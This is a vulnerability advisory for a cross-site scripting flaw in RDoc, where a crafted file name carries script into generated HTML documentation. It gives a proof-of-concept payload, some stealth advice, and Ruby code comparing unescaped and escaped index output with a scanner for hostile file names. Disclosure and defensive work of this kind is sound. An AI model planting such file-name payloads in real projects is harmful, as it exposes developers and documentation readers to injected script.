CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 0.004 Low (percentile 69.9%)
When generating RDoc HTML documentation, it is possible to inject malicious code through a file name.
~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here
~ $ ls
"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here
~ $ rdoc --all
Now the generated index file contains the injected JavaScript code:
...
<li><a href="./"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here.html">"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here</a>
...
I set the vulnerability to the same severity as CVE-2013-0256, since rdoc is widely used on dev/production systems, online documentation, etc. An attacker can hide a badly named file deep in the project structure to be stealthy. Also, the file can have a deceptive name in the documentation list and can contain real documentation code, so as not to arouse suspicion for some time.
The injected code can exfiltrate data or install malware on the user's or developer's machine, etc.
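The index entry above is produced by concatenating the file name into both the href attribute and the link text without any escaping. The following Ruby is an added example, not RDoc's own code or the reporter's: it reproduces that unsafe concatenation next to a hardened version (percent-encoding the path segment with ERB::Util.url_encode and HTML-escaping with CGI.escapeHTML), and adds a small tree scanner a maintainer could run in CI to flag file names carrying HTML metacharacters. The sample file names are constructed here, with the second one copied from the report; the function names are this example's own.

```ruby
require "cgi"
require "erb"
require "find"
require "tmpdir"

# Constructed sample names: one benign, one carrying the payload from the report.
SAMPLE_FILES = [
  "README",
  "\"><object src=1 onerror=\"javascript:alert(1);\">Controlling what is documented here",
].freeze

# Unsafe pattern: the raw name lands verbatim inside an attribute and inside element text,
# which is exactly what lets a crafted file name close the attribute and open <object>.
def index_entry_unescaped(name)
  %(<li><a href="./#{name}.html">#{name}</a></li>)
end

# Hardened form: percent-encode the name as a URL path segment, then HTML-escape
# both the attribute value and the visible text (each context gets its own encoding).
def index_entry_escaped(name)
  href = "./" + ERB::Util.url_encode(name) + ".html"
  %(<li><a href="#{CGI.escapeHTML(href)}">#{CGI.escapeHTML(name)}</a></li>)
end

def build_index(names, escape: true)
  entries = names.map { |n| escape ? index_entry_escaped(n) : index_entry_unescaped(n) }
  "<ul>\n" + entries.join("\n") + "\n</ul>"
end

# Characters that have no business in a documented file name; any hit is worth a look
# even on a fixed RDoc, because the same name will be rendered by other tools too.
HOSTILE_CHARS = /[<>"'&]/

def suspicious_names(names)
  names.select { |n| n.match?(HOSTILE_CHARS) }
end

# Walks a project tree and returns the base names that match HOSTILE_CHARS.
# The report notes the file can be hidden deep in the tree, so recurse everything.
def scan_tree(root)
  names = []
  Find.find(root) { |path| names << File.basename(path) unless path == root }
  suspicious_names(names)
end

if __FILE__ == $0
  puts "--- unescaped (vulnerable) ---"
  puts build_index(SAMPLE_FILES, escape: false)
  puts "--- escaped ---"
  puts build_index(SAMPLE_FILES)
  Dir.mktmpdir do |dir|
    SAMPLE_FILES.each { |n| File.write(File.join(dir, n), "") }
    puts "--- suspicious names in #{dir} ---"
    puts scan_tree(dir)
  end
end
```

The two entries differ only in where the name is encoded: url_encode guards the href, CGI.escapeHTML guards the HTML contexts. Encoding for one context alone is not enough, since the report's payload breaks out of the attribute first and then injects markup.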